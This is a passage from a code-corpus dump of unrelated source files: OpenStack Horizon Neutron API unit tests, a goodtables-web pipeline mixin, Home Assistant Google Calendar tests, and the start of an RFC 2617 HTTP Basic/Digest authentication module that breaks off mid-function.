# use deepcopy to ensure self.api_security_groups is not modified.
self.qclient.show_security_group.return_value = \
{'security_group': copy.deepcopy(secgroup)}
self.qclient.list_security_groups.return_value = \
{'security_groups': related_sgs}
ret = api.neutron.security_group_get(self.request, secgroup['id'])
self._cmp_sg(secgroup, ret)
self.qclient.show_security_group.assert_called_once_with(
secgroup['id'])
self.qclient.list_security_groups.assert_called_once_with(
id=sg_ids, fields=['id', 'name'])
def test_security_group_create(self):
secgroup = self.api_security_groups.list()[1]
body = {'security_group':
{'name': secgroup['name'],
'description': secgroup['description'],
'tenant_id': self.request.user.project_id}}
self.qclient.create_security_group.return_value = \
{'security_group': copy.deepcopy(secgroup)}
ret = api.neutron.security_group_create(self.request, secgroup['name'],
secgroup['description'])
self._cmp_sg(secgroup, ret)
self.qclient.create_security_group.assert_called_once_with(body)
def test_security_group_update(self):
secgroup = self.api_security_groups.list()[1]
secgroup = copy.deepcopy(secgroup)
secgroup['name'] = 'newname'
secgroup['description'] = 'new description'
body = {'security_group':
{'name': secgroup['name'],
'description': secgroup['description']}}
self.qclient.update_security_group.return_value = {'security_group':
secgroup}
ret = api.neutron.security_group_update(self.request,
secgroup['id'],
secgroup['name'],
secgroup['description'])
self._cmp_sg(secgroup, ret)
self.qclient.update_security_group.assert_called_once_with(
secgroup['id'], body)
def test_security_group_delete(self):
secgroup = self.api_security_groups.first()
self.qclient.delete_security_group.return_value = None
api.neutron.security_group_delete(self.request, secgroup['id'])
self.qclient.delete_security_group.assert_called_once_with(
secgroup['id'])
def test_security_group_rule_create(self):
self._test_security_group_rule_create(with_desc=True)
def test_security_group_rule_create_without_desc(self):
self._test_security_group_rule_create(with_desc=False)
def test_security_group_rule_create_with_custom_protocol(self):
self._test_security_group_rule_create(custom_ip_proto=True)
def _test_security_group_rule_create(self, with_desc=False,
custom_ip_proto=False):
if custom_ip_proto:
sg_rule = [r for r in self.api_security_group_rules.list()
if r['protocol'] == '99'][0]
else:
sg_rule = [r for r in self.api_security_group_rules.list()
if r['protocol'] == 'tcp' and r['remote_ip_prefix']][0]
sg_id = sg_rule['security_group_id']
secgroup = [sg for sg in self.api_security_groups.list()
if sg['id'] == sg_id][0]
post_rule = copy.deepcopy(sg_rule)
del post_rule['id']
del post_rule['tenant_id']
if not with_desc:
del post_rule['description']
post_body = {'security_group_rule': post_rule}
self.qclient.create_security_group_rule.return_value = \
{'security_group_rule': copy.deepcopy(sg_rule)}
self.qclient.list_security_groups.return_value = \
{'security_groups': [copy.deepcopy(secgroup)]}
if with_desc:
description = sg_rule['description']
else:
description = None
ret = api.neutron.security_group_rule_create(
self.request, sg_rule['security_group_id'],
sg_rule['direction'], sg_rule['ethertype'], sg_rule['protocol'],
sg_rule['port_range_min'], sg_rule['port_range_max'],
sg_rule['remote_ip_prefix'], sg_rule['remote_group_id'],
description)
self._cmp_sg_rule(sg_rule, ret)
self.qclient.create_security_group_rule.assert_called_once_with(
post_body)
self.qclient.list_security_groups.assert_called_once_with(
id=set([sg_id]), fields=['id', 'name'])
def test_security_group_rule_delete(self):
sg_rule = self.api_security_group_rules.first()
self.qclient.delete_security_group_rule.return_value = None
api.neutron.security_group_rule_delete(self.request, sg_rule['id'])
self.qclient.delete_security_group_rule.assert_called_once_with(
sg_rule['id'])
def _get_instance(self, cur_sg_ids):
instance_port = [p for p in self.api_ports.list()
if p['device_owner'].startswith('compute:')][0]
instance_id = instance_port['device_id']
# Emulate an instance with two ports
instance_ports = []
for _i in range(2):
p = copy.deepcopy(instance_port)
p['id'] = uuidutils.generate_uuid()
p['security_groups'] = cur_sg_ids
instance_ports.append(p)
return (instance_id, instance_ports)
def test_server_security_groups(self):
cur_sg_ids = [sg['id'] for sg in self.api_security_groups.list()[:2]]
instance_id, instance_ports = self._get_instance(cur_sg_ids)
self.qclient.list_ports.return_value = {'ports': instance_ports}
secgroups = copy.deepcopy(self.api_security_groups.list())
self.qclient.list_security_groups.return_value = \
{'security_groups': secgroups}
api.neutron.server_security_groups(self.request, instance_id)
self.qclient.list_ports.assert_called_once_with(device_id=instance_id)
self.qclient.list_security_groups.assert_called_once_with(
id=set(cur_sg_ids))
def test_server_update_security_groups(self):
cur_sg_ids = [self.api_security_groups.first()['id']]
new_sg_ids = [sg['id'] for sg in self.api_security_groups.list()[:2]]
instance_id, instance_ports = self._get_instance(cur_sg_ids)
self.qclient.list_ports.return_value = {'ports': instance_ports}
self.qclient.update_port.side_effect = \
[{'port': p} for p in instance_ports]
api.neutron.server_update_security_groups(
self.request, instance_id, new_sg_ids)
self.qclient.list_ports.assert_called_once_with(device_id=instance_id)
body = {'port': {'security_groups': new_sg_ids}}
expected_calls = [mock.call(p['id'], body=body)
for p in instance_ports]
self.qclient.update_port.assert_has_calls(expected_calls)
class NeutronApiFloatingIpTests(test.APIMockTestCase):
def setUp(self):
super(NeutronApiFloatingIpTests, self).setUp()
neutronclient = mock.patch.object(api.neutron, 'neutronclient').start()
self.qclient = neutronclient.return_value
@override_settings(OPENSTACK_NEUTRON_NETWORK={'enable_router': True})
def test_floating_ip_supported(self):
self.assertTrue(api.neutron.floating_ip_supported(self.request))
@override_settings(OPENSTACK_NEUTRON_NETWORK={'enable_router': False})
def test_floating_ip_supported_false(self):
self.assertFalse(api.neutron.floating_ip_supported(self.request))
def test_floating_ip_pools_list(self):
search_opts = {'router:external': True}
ext_nets = [n for n in self.api_networks.list()
if n['router:external']]
self.qclient.list_networks.return_value = {'networks': ext_nets}
rets = api.neutron.floating_ip_pools_list(self.request)
for attr in ['id', 'name']:
self.assertEqual([p[attr] for p in ext_nets],
[getattr(p, attr) for p in rets])
self.qclient.list_networks.assert_called_once_with(**search_opts)
def test_floating_ip_list(self):
fips = self.api_floating_ips.list()
filters = {'tenant_id': self.request.user.tenant_id}
self.qclient.list_floatingips.return_value = {'floatingips': fips}
self.qclient.list_ports.return_value = {'ports': self.api_ports.list()}
rets = api.neutron.tenant_floating_ip_list(self.request)
assoc_port = self.api_ports.list()[1]
self.assertEqual(len(fips), len(rets))
for ret, exp in zip(rets, fips):
for attr in ['id', 'ip', 'pool', 'fixed_ip', 'port_id']:
self.assertEqual(exp[attr], getattr(ret, attr))
if exp['port_id']:
dev_id = assoc_port['device_id'] if exp['port_id'] else None
self.assertEqual(dev_id, ret.instance_id)
self.assertEqual('compute', ret.instance_type)
else:
self.assertIsNone(ret.instance_id)
self.assertIsNone(ret.instance_type)
self.qclient.list_floatingips.assert_called_once_with(**filters)
self.qclient.list_ports.assert_called_once_with(**filters)
def test_floating_ip_list_all_tenants(self):
fips = self.api_floating_ips.list()
self.qclient.list_floatingips.return_value = {'floatingips': fips}
self.qclient.list_ports.return_value = {'ports': self.api_ports.list()}
fip_manager = api.neutron.FloatingIpManager(self.request)
rets = fip_manager.list(all_tenants=True)
assoc_port = self.api_ports.list()[1]
self.assertEqual(len(fips), len(rets))
for ret, exp in zip(rets, fips):
for attr in ['id', 'ip', 'pool', 'fixed_ip', 'port_id']:
self.assertEqual(getattr(ret, attr), exp[attr])
if exp['port_id']:
dev_id = assoc_port['device_id'] if exp['port_id'] else None
self.assertEqual(dev_id, ret.instance_id)
self.assertEqual('compute', ret.instance_type)
else:
self.assertIsNone(ret.instance_id)
self.assertIsNone(ret.instance_type)
self.qclient.list_floatingips.assert_called_once_with()
self.qclient.list_ports.assert_called_once_with()
def _test_floating_ip_get_associated(self, assoc_port, exp_instance_type):
fip = self.api_floating_ips.list()[1]
self.qclient.show_floatingip.return_value = {'floatingip': fip}
self.qclient.show_port.return_value = {'port': assoc_port}
ret = api.neutron.tenant_floating_ip_get(self.request, fip['id'])
for attr in ['id', 'ip', 'pool', 'fixed_ip', 'port_id']:
self.assertEqual(fip[attr], getattr(ret, attr))
self.assertEqual(assoc_port['device_id'], ret.instance_id)
self.assertEqual(exp_instance_type, ret.instance_type)
self.qclient.show_floatingip.assert_called_once_with(fip['id'])
self.qclient.show_port.assert_called_once_with(assoc_port['id'])
def test_floating_ip_get_associated(self):
assoc_port = self.api_ports.list()[1]
self._test_floating_ip_get_associated(assoc_port, 'compute')
def test_floating_ip_get_associated_with_loadbalancer_vip(self):
assoc_port = copy.deepcopy(self.api_ports.list()[1])
assoc_port['device_owner'] = 'neutron:LOADBALANCER'
assoc_port['device_id'] = uuidutils.generate_uuid()
assoc_port['name'] = 'vip-' + uuidutils.generate_uuid()
self._test_floating_ip_get_associated(assoc_port, 'loadbalancer')
def test_floating_ip_get_unassociated(self):
fip = self.api_floating_ips.list()[0]
self.qclient.show_floatingip.return_value = {'floatingip': fip}
ret = api.neutron.tenant_floating_ip_get(self.request, fip['id'])
for attr in ['id', 'ip', 'pool', 'fixed_ip', 'port_id']:
self.assertEqual(fip[attr], getattr(ret, attr))
self.assertIsNone(ret.instance_id)
self.assertIsNone(ret.instance_type)
self.qclient.show_floatingip.assert_called_once_with(fip['id'])
def test_floating_ip_allocate(self):
ext_nets = [n for n in self.api_networks.list()
if n['router:external']]
ext_net = ext_nets[0]
fip = self.api_floating_ips.first()
self.qclient.create_floatingip.return_value = {'floatingip': fip}
ret = api.neutron.tenant_floating_ip_allocate(self.request,
ext_net['id'])
for attr in ['id', 'ip', 'pool', 'fixed_ip', 'port_id']:
self.assertEqual(fip[attr], getattr(ret, attr))
self.assertIsNone(ret.instance_id)
self.assertIsNone(ret.instance_type)
self.qclient.create_floatingip.assert_called_once_with(
{'floatingip': {'floating_network_id': ext_net['id'],
'tenant_id': self.request.user.project_id}})
def test_floating_ip_release(self):
fip = self.api_floating_ips.first()
self.qclient.delete_floatingip.return_value = None
api.neutron.tenant_floating_ip_release(self.request, fip['id'])
self.qclient.delete_floatingip.assert_called_once_with(fip['id'])
def test_floating_ip_associate(self):
fip = self.api_floating_ips.list()[1]
assoc_port = self.api_ports.list()[1]
ip_address = assoc_port['fixed_ips'][0]['ip_address']
target_id = '%s_%s' % (assoc_port['id'], ip_address)
params = {'port_id': assoc_port['id'],
'fixed_ip_address': ip_address}
self.qclient.update_floatingip.return_value = None
api.neutron.floating_ip_associate(self.request, fip['id'], target_id)
self.qclient.update_floatingip.assert_called_once_with(
fip['id'], {'floatingip': params})
def test_floating_ip_disassociate(self):
fip = self.api_floating_ips.list()[1]
self.qclient.update_floatingip.return_value = None
api.neutron.floating_ip_disassociate(self.request, fip['id'])
self.qclient.update_floatingip.assert_called_once_with(
fip['id'], {'floatingip': {'port_id': None}})
def _get_target_id(self, port, ip=None, index=0):
param = {'id': port['id'],
'addr': ip or port['fixed_ips'][index]['ip_address']}
return '%(id)s_%(addr)s' % param
def _get_target_name(self, port, ip=None):
param = {'svrid': port['device_id'],
'addr': ip or port['fixed_ips'][0]['ip_address']}
return 'server_%(svrid)s: %(addr)s' % param
@override_settings(
OPENSTACK_NEUTRON_NETWORK={
'enable_fip_topology_check': True,
}
)
@mock.patch.object(api._nova, 'novaclient')
def test_floating_ip_target_list(self, mock_novaclient):
ports = self.api_ports.list()
# Port on the first subnet is connected to a router
# attached to external network in neutron_data.
subnet_id = self.subnets.first().id
shared_nets = [n for n in self.api_networks.list() if n['shared']]
shared_subnet_ids = [s for n in shared_nets for s in n['subnets']]
target_ports = []
for p in ports:
if p['device_owner'].startswith('network:'):
continue
port_subnets = [ip['subnet_id'] for ip in p['fixed_ips']]
if not (subnet_id in port_subnets or
(set(shared_subnet_ids) & set(port_subnets))):
continue
for ip in p['fixed_ips']:
if netaddr.IPAddress(ip['ip_address']).version != 4:
continue
target_ports.append((
self._get_target_id(p, ip['ip_address']),
self._get_target_name(p, ip['ip_address'])))
filters = {'tenant_id': self.request.user.tenant_id}
self.qclient.list_ports.return_value = {'ports': ports}
servers = self.servers.list()
novaclient = mock_novaclient.return_value
ver = mock.Mock(min_version='2.1', version='2.45')
novaclient.versions.get_current.return_value = ver
novaclient.servers.list.return_value = servers
ext_nets = [n for n in self.api_networks.list()
if n['router:external']]
list_networks_retvals = [{'networks': ext_nets},
{'networks': shared_nets}]
self.qclient.list_networks.side_effect = list_networks_retvals
self.qclient.list_routers.return_value = {'routers':
self.api_routers.list()}
shared_subs = [s for s in self.api_subnets.list()
if s['id'] in shared_subnet_ids]
self.qclient.list_subnets.return_value = {'subnets': shared_subs}
rets = api.neutron.floating_ip_target_list(self.request)
self.assertEqual(len(target_ports), len(rets))
for ret, exp in zip(rets, target_ports):
pid, ip_address = ret.id.split('_', 1)
self.assertEqual(4, netaddr.IPAddress(ip['ip_address']).version)
self.assertEqual(exp[0], ret.id)
self.assertEqual(exp[1], ret.name)
self.qclient.list_ports.assert_called_once_with(**filters)
novaclient.versions.get_current.assert_called_once_with()
novaclient.servers.list.assert_called_once_with(
False, {'project_id': self.request.user.tenant_id})
self.qclient.list_networks.assert_has_calls([
mock.call(**{'router:external': True}),
mock.call(shared=True),
])
self.qclient.list_routers.assert_called_once_with()
self.qclient.list_subnets.assert_called_once_with()
@mock.patch.object(api._nova, 'novaclient')
def _test_target_floating_ip_port_by_instance(self, server, ports,
candidates, mock_novaclient):
# list_ports and list_networks are called multiple times,
# we prepare a list for return values.
list_ports_retvals = []
self.qclient.list_ports.side_effect = list_ports_retvals
list_nets_retvals = []
self.qclient.list_networks.side_effect = list_nets_retvals
# _target_ports_by_instance()
list_ports_retvals.append({'ports': candidates})
# _get_reachable_subnets()
ext_nets = [n for n in self.api_networks.list()
if n['router:external']]
list_nets_retvals.append({'networks': ext_nets})
self.qclient.list_routers.side_effect = [{'routers':
self.api_routers.list()}]
rinfs = [p for p in ports
if p['device_owner'] in api.neutron.ROUTER_INTERFACE_OWNERS]
list_ports_retvals.append({'ports': rinfs})
shared_nets = [n for n in self.api_networks.list() if n['shared']]
list_nets_retvals.append({'networks': shared_nets})
shared_subnet_ids = [s for n in shared_nets for s in n['subnets']]
shared_subs = [s for s in self.api_subnets.list()
if s['id'] in shared_subnet_ids]
self.qclient.list_subnets.side_effect = [{'subnets': shared_subs}]
# _get_server_name()
novaclient = mock_novaclient.return_value
ver = mock.Mock(min_version='2.1', version='2.45')
novaclient.versions.get_current.return_value = ver
novaclient.servers.get.return_value = server
ret_val = api.neutron.floating_ip_target_list_by_instance(self.request,
server.id)
self.qclient.list_ports.assert_has_calls([
mock.call(device_id=server.id),
mock.call(device_owner=api.neutron.ROUTER_INTERFACE_OWNERS),
])
self.qclient.list_networks.assert_has_calls([
mock.call(**{'router:external': True}),
mock.call(shared=True),
])
self.qclient.list_routers.assert_called_once_with()
self.qclient.list_subnets.assert_called_once_with()
novaclient.versions.get_current.assert_called_once_with()
novaclient.servers.get.assert_called_once_with(server.id)
return ret_val
def test_target_floating_ip_port_by_instance(self):
server = self.servers.first()
ports = self.api_ports.list()
candidates = [p for p in ports if p['device_id'] == server.id]
ret = self._test_target_floating_ip_port_by_instance(server, ports,
candidates)
self.assertEqual(1, len(ret))
ret_val = ret[0]
self.assertEqual(self._get_target_id(candidates[0]), ret_val.id)
self.assertEqual(candidates[0]['id'], ret_val.port_id)
self.assertEqual(candidates[0]['device_id'], ret_val.instance_id)
def test_target_floating_ip_port_by_instance_with_ipv6(self):
server = self.servers.first()
ports = self.api_ports.list()
candidates = [p for p in ports if p['device_id'] == server.id]
# Move the IPv6 entry first
fixed_ips = candidates[0]['fixed_ips']
candidates[0]['fixed_ips'] = [fixed_ips[1], fixed_ips[0]]
# Check the first IP address is IPv6
first_ip = candidates[0]['fixed_ips'][0]['ip_address']
self.assertEqual(6, netaddr.IPAddress(first_ip).version)
ret = self._test_target_floating_ip_port_by_instance(server, ports,
candidates)
self.assertEqual(1, len(ret))
ret_val = ret[0]
self.assertEqual(self._get_target_id(candidates[0], index=1),
ret_val.id)
self.assertEqual(candidates[0]['id'], ret_val.port_id)
self.assertEqual(candidates[0]['device_id'], ret_val.instance_id)
def _get_preloaded_targets(self):
return [
api.neutron.FloatingIpTarget(
api.neutron.Port({'name': 'name11', 'id': 'id11',
'device_id': 'id-vm1'}),
'192.168.1.1', 'vm1'),
api.neutron.FloatingIpTarget(
api.neutron.Port({'name': 'name21', 'id': 'id21',
'device_id': 'id-vm2'}),
'172.16.1.1', 'vm2'),
api.neutron.FloatingIpTarget(
api.neutron.Port({'name': 'name22', 'id': 'id22',
'device_id': 'id-vm2'}),
'10.11.12.13', 'vm3'),
]
def test_target_floating_ip_port_by_instance_with_preloaded_target(self):
target_list = self._get_preloaded_targets()
ret = api.neutron.floating_ip_target_list_by_instance(
self.request, 'id-vm2', target_list)
self.assertEqual(['id21', 'id22'], [r.port_id for r in ret])
| apache-2.0 | -9,127,317,398,460,591,000 | 44.06191 | 79 | 0.608728 | false |
okfn/goodtables-web | web/components/commons/view_mixins.py | 1 | 1387 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
from werkzeug.datastructures import FileStorage
from flask import current_app as app
from goodtables.pipeline import Pipeline
from . import utilities
from ... import compat
class RunPipelineMixin(object):
def run_pipeline(self, with_permalinks=False):
payload = utilities.clean_payload(utilities.get_runargs())
data = {}
data['sources'] = utilities.get_data_urls()
data['success'] = False
data['report'] = app.config['GOODTABLES_PIPELINE_BUILD_ERROR_RESPONSE']
if with_permalinks:
data['permalinks'] = utilities.get_report_permalinks(payload)
if isinstance(payload['data'], FileStorage):
payload['data'] = payload['data'].stream
# build and run a validation pipeline
try:
pipeline = utilities.get_pipeline(payload)
except Exception as e:
pipeline = None
data['report']['error_title'] = e.__class__.__name__
data['report']['error_message'] = compat.str(e)
if isinstance(pipeline, Pipeline):
success, report = pipeline.run()
data.update({'success': success, 'report': report.generate()})
return data
| mit | -7,738,223,652,564,126,000 | 31.255814 | 79 | 0.638789 | false |
kennedyshead/home-assistant | tests/components/google/test_calendar.py | 8 | 11233 | """The tests for the google calendar platform."""
import copy
from unittest.mock import Mock, patch
import httplib2
import pytest
from homeassistant.components.google import (
CONF_CAL_ID,
CONF_CLIENT_ID,
CONF_CLIENT_SECRET,
CONF_DEVICE_ID,
CONF_ENTITIES,
CONF_NAME,
CONF_TRACK,
DEVICE_SCHEMA,
SERVICE_SCAN_CALENDARS,
do_setup,
)
from homeassistant.const import STATE_OFF, STATE_ON
from homeassistant.helpers.template import DATE_STR_FORMAT
from homeassistant.setup import async_setup_component
from homeassistant.util import slugify
import homeassistant.util.dt as dt_util
from tests.common import async_mock_service
GOOGLE_CONFIG = {CONF_CLIENT_ID: "client_id", CONF_CLIENT_SECRET: "client_secret"}
TEST_ENTITY = "calendar.we_are_we_are_a_test_calendar"
TEST_ENTITY_NAME = "We are, we are, a... Test Calendar"
TEST_EVENT = {
"summary": "Test All Day Event",
"start": {},
"end": {},
"location": "Test Cases",
"description": "test event",
"kind": "calendar#event",
"created": "2016-06-23T16:37:57.000Z",
"transparency": "transparent",
"updated": "2016-06-24T01:57:21.045Z",
"reminders": {"useDefault": True},
"organizer": {
"email": "[email protected]",
"displayName": "Organizer Name",
"self": True,
},
"sequence": 0,
"creator": {
"email": "[email protected]",
"displayName": "Organizer Name",
"self": True,
},
"id": "_c8rinwq863h45qnucyoi43ny8",
"etag": '"2933466882090000"',
"htmlLink": "https://www.google.com/calendar/event?eid=*******",
"iCalUID": "[email protected]",
"status": "confirmed",
}
def get_calendar_info(calendar):
"""Convert data from Google into DEVICE_SCHEMA."""
calendar_info = DEVICE_SCHEMA(
{
CONF_CAL_ID: calendar["id"],
CONF_ENTITIES: [
{
CONF_TRACK: calendar["track"],
CONF_NAME: calendar["summary"],
CONF_DEVICE_ID: slugify(calendar["summary"]),
}
],
}
)
return calendar_info
@pytest.fixture(autouse=True)
def mock_google_setup(hass, test_calendar):
"""Mock the google set up functions."""
hass.loop.run_until_complete(async_setup_component(hass, "group", {"group": {}}))
calendar = get_calendar_info(test_calendar)
calendars = {calendar[CONF_CAL_ID]: calendar}
patch_google_auth = patch(
"homeassistant.components.google.do_authentication", side_effect=do_setup
)
patch_google_load = patch(
"homeassistant.components.google.load_config", return_value=calendars
)
patch_google_services = patch("homeassistant.components.google.setup_services")
async_mock_service(hass, "google", SERVICE_SCAN_CALENDARS)
with patch_google_auth, patch_google_load, patch_google_services:
yield
@pytest.fixture(autouse=True)
def mock_http(hass):
"""Mock the http component."""
hass.http = Mock()
@pytest.fixture(autouse=True)
def set_time_zone():
"""Set the time zone for the tests."""
# Set our timezone to CST/Regina so we can check calculations
# This keeps UTC-6 all year round
dt_util.set_default_time_zone(dt_util.get_time_zone("America/Regina"))
yield
dt_util.set_default_time_zone(dt_util.get_time_zone("UTC"))
@pytest.fixture(name="google_service")
def mock_google_service():
"""Mock google service."""
patch_google_service = patch(
"homeassistant.components.google.calendar.GoogleCalendarService"
)
with patch_google_service as mock_service:
yield mock_service
async def test_all_day_event(hass, mock_next_event):
"""Test that we can create an event trigger on device."""
week_from_today = dt_util.dt.date.today() + dt_util.dt.timedelta(days=7)
end_event = week_from_today + dt_util.dt.timedelta(days=1)
event = copy.deepcopy(TEST_EVENT)
start = week_from_today.isoformat()
end = end_event.isoformat()
event["start"]["date"] = start
event["end"]["date"] = end
mock_next_event.return_value.event = event
assert await async_setup_component(hass, "google", {"google": GOOGLE_CONFIG})
await hass.async_block_till_done()
state = hass.states.get(TEST_ENTITY)
assert state.name == TEST_ENTITY_NAME
assert state.state == STATE_OFF
assert dict(state.attributes) == {
"friendly_name": TEST_ENTITY_NAME,
"message": event["summary"],
"all_day": True,
"offset_reached": False,
"start_time": week_from_today.strftime(DATE_STR_FORMAT),
"end_time": end_event.strftime(DATE_STR_FORMAT),
"location": event["location"],
"description": event["description"],
}
async def test_future_event(hass, mock_next_event):
"""Test that we can create an event trigger on device."""
one_hour_from_now = dt_util.now() + dt_util.dt.timedelta(minutes=30)
end_event = one_hour_from_now + dt_util.dt.timedelta(minutes=60)
start = one_hour_from_now.isoformat()
end = end_event.isoformat()
event = copy.deepcopy(TEST_EVENT)
event["start"]["dateTime"] = start
event["end"]["dateTime"] = end
mock_next_event.return_value.event = event
assert await async_setup_component(hass, "google", {"google": GOOGLE_CONFIG})
await hass.async_block_till_done()
state = hass.states.get(TEST_ENTITY)
assert state.name == TEST_ENTITY_NAME
assert state.state == STATE_OFF
assert dict(state.attributes) == {
"friendly_name": TEST_ENTITY_NAME,
"message": event["summary"],
"all_day": False,
"offset_reached": False,
"start_time": one_hour_from_now.strftime(DATE_STR_FORMAT),
"end_time": end_event.strftime(DATE_STR_FORMAT),
"location": event["location"],
"description": event["description"],
}
async def test_in_progress_event(hass, mock_next_event):
"""Test that we can create an event trigger on device."""
middle_of_event = dt_util.now() - dt_util.dt.timedelta(minutes=30)
end_event = middle_of_event + dt_util.dt.timedelta(minutes=60)
start = middle_of_event.isoformat()
end = end_event.isoformat()
event = copy.deepcopy(TEST_EVENT)
event["start"]["dateTime"] = start
event["end"]["dateTime"] = end
mock_next_event.return_value.event = event
assert await async_setup_component(hass, "google", {"google": GOOGLE_CONFIG})
await hass.async_block_till_done()
state = hass.states.get(TEST_ENTITY)
assert state.name == TEST_ENTITY_NAME
assert state.state == STATE_ON
assert dict(state.attributes) == {
"friendly_name": TEST_ENTITY_NAME,
"message": event["summary"],
"all_day": False,
"offset_reached": False,
"start_time": middle_of_event.strftime(DATE_STR_FORMAT),
"end_time": end_event.strftime(DATE_STR_FORMAT),
"location": event["location"],
"description": event["description"],
}
async def test_offset_in_progress_event(hass, mock_next_event):
"""Test that we can create an event trigger on device."""
middle_of_event = dt_util.now() + dt_util.dt.timedelta(minutes=14)
end_event = middle_of_event + dt_util.dt.timedelta(minutes=60)
start = middle_of_event.isoformat()
end = end_event.isoformat()
event_summary = "Test Event in Progress"
event = copy.deepcopy(TEST_EVENT)
event["start"]["dateTime"] = start
event["end"]["dateTime"] = end
event["summary"] = f"{event_summary} !!-15"
mock_next_event.return_value.event = event
assert await async_setup_component(hass, "google", {"google": GOOGLE_CONFIG})
await hass.async_block_till_done()
state = hass.states.get(TEST_ENTITY)
assert state.name == TEST_ENTITY_NAME
assert state.state == STATE_OFF
assert dict(state.attributes) == {
"friendly_name": TEST_ENTITY_NAME,
"message": event_summary,
"all_day": False,
"offset_reached": True,
"start_time": middle_of_event.strftime(DATE_STR_FORMAT),
"end_time": end_event.strftime(DATE_STR_FORMAT),
"location": event["location"],
"description": event["description"],
}
@pytest.mark.skip
async def test_all_day_offset_in_progress_event(hass, mock_next_event):
"""Test that we can create an event trigger on device."""
tomorrow = dt_util.dt.date.today() + dt_util.dt.timedelta(days=1)
end_event = tomorrow + dt_util.dt.timedelta(days=1)
start = tomorrow.isoformat()
end = end_event.isoformat()
event_summary = "Test All Day Event Offset In Progress"
event = copy.deepcopy(TEST_EVENT)
event["start"]["date"] = start
event["end"]["date"] = end
event["summary"] = f"{event_summary} !!-25:0"
mock_next_event.return_value.event = event
assert await async_setup_component(hass, "google", {"google": GOOGLE_CONFIG})
await hass.async_block_till_done()
state = hass.states.get(TEST_ENTITY)
assert state.name == TEST_ENTITY_NAME
assert state.state == STATE_OFF
assert dict(state.attributes) == {
"friendly_name": TEST_ENTITY_NAME,
"message": event_summary,
"all_day": True,
"offset_reached": True,
"start_time": tomorrow.strftime(DATE_STR_FORMAT),
"end_time": end_event.strftime(DATE_STR_FORMAT),
"location": event["location"],
"description": event["description"],
}
async def test_all_day_offset_event(hass, mock_next_event):
"""Test that we can create an event trigger on device."""
tomorrow = dt_util.dt.date.today() + dt_util.dt.timedelta(days=2)
end_event = tomorrow + dt_util.dt.timedelta(days=1)
start = tomorrow.isoformat()
end = end_event.isoformat()
offset_hours = 1 + dt_util.now().hour
event_summary = "Test All Day Event Offset"
event = copy.deepcopy(TEST_EVENT)
event["start"]["date"] = start
event["end"]["date"] = end
event["summary"] = f"{event_summary} !!-{offset_hours}:0"
mock_next_event.return_value.event = event
assert await async_setup_component(hass, "google", {"google": GOOGLE_CONFIG})
await hass.async_block_till_done()
state = hass.states.get(TEST_ENTITY)
assert state.name == TEST_ENTITY_NAME
assert state.state == STATE_OFF
assert dict(state.attributes) == {
"friendly_name": TEST_ENTITY_NAME,
"message": event_summary,
"all_day": True,
"offset_reached": False,
"start_time": tomorrow.strftime(DATE_STR_FORMAT),
"end_time": end_event.strftime(DATE_STR_FORMAT),
"location": event["location"],
"description": event["description"],
}
async def test_update_error(hass, google_service):
"""Test that the calendar handles a server error."""
google_service.return_value.get = Mock(
side_effect=httplib2.ServerNotFoundError("unit test")
)
assert await async_setup_component(hass, "google", {"google": GOOGLE_CONFIG})
await hass.async_block_till_done()
state = hass.states.get(TEST_ENTITY)
assert state.name == TEST_ENTITY_NAME
assert state.state == "off"
| apache-2.0 | 7,621,273,218,091,933,000 | 34.547468 | 85 | 0.645776 | false |
OpenQbo/qbo_webi | src/teleoperation/sip2rtmp/p2p-sip/src/std/rfc2617.py | 4 | 6811 | # Copyright (c) 2007, Kundan Singh. All rights reserved. See LICENSING for details.
# @implements RFC2617 (HTTP auth)
'''
The HTTP basic and digest access authentication as per RFC 2617.
'''
from random import randint
from hashlib import md5
from base64 import b64encode
import time
# @implements RFC2617 P3L16-P3L25
_quote = lambda s: '"' + s + '"' if not s or s[0] != '"' != s[-1] else s
_unquote = lambda s: s[1:-1] if s and s[0] == '"' == s[-1] else s
def createAuthenticate(authMethod='Digest', **kwargs):
'''Build the WWW-Authenticate header's value.
>>> print createAuthenticate('Basic', realm='iptel.org')
Basic realm="iptel.org"
>>> print createAuthenticate('Digest', realm='iptel.org', domain='sip:iptel.org', nonce='somenonce')
Digest realm="iptel.org", domain="sip:iptel.org", qop="auth", nonce="somenonce", opaque="", stale=FALSE, algorithm=MD5
'''
if authMethod.lower() == 'basic':
return 'Basic realm=%s'%(_quote(kwargs.get('realm', '')))
elif authMethod.lower() == 'digest':
predef = ('realm', 'domain', 'qop', 'nonce', 'opaque', 'stale', 'algorithm')
unquoted = ('stale', 'algorithm')
now = time.time(); nonce = kwargs.get('nonce', b64encode('%d %s'%(now, md5('%d:%d'%(now, id(createAuthenticate))))))
default = dict(realm='', domain='', opaque='', stale='FALSE', algorithm='MD5', qop='auth', nonce=nonce)
kv = map(lambda x: (x, kwargs.get(x, default[x])), predef) + filter(lambda x: x[0] not in predef, kwargs.items()) # put predef attributes in order before non predef attributes
return 'Digest ' + ', '.join(map(lambda y: '%s=%s'%(y[0], _quote(y[1]) if y[0] not in unquoted else y[1]), kv))
else: raise ValueError, 'invalid authMethod%s'%(authMethod)
# @implements RFC2617 P3L27-P3L36
# @implements RFC2617 P4L14-P4L29
def createAuthorization(challenge, username, password, uri=None, method=None, entityBody=None, context=None):
'''Build the Authorization header for this challenge. The challenge represents the
WWW-Authenticate header's value and the function returns the Authorization
header's value. The context (dict) is used to save cnonce and nonceCount
if available. The uri represents the request URI str, and method the request
method. The result contains the properties in alphabetical order of property name.
>>> context = {'cnonce':'0a4f113b', 'nc': 0}
>>> print createAuthorization('Digest realm="[email protected]", qop="auth", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", opaque="5ccc069c403ebaf9f0171e9517f40e41"', 'Mufasa', 'Circle Of Life', '/dir/index.html', 'GET', None, context)
Digest cnonce="0a4f113b",nc=00000001,nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",opaque="5ccc069c403ebaf9f0171e9517f40e41",qop=auth,realm="[email protected]",response="6629fae49393a05397450978507c4ef1",uri="/dir/index.html",username="Mufasa"
>>> print createAuthorization('Basic realm="WallyWorld"', 'Aladdin', 'open sesame')
Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
'''
authMethod, sep, rest = challenge.strip().partition(' ')
ch, cr = dict(), dict() # challenge and credentials
cr['password'] = password
cr['username'] = username
# @implements RFC2617 P5L20-P5L41
if authMethod.lower() == 'basic':
return authMethod + ' ' + basic(cr)
# @implements RFC2617 P6L46-P7L5
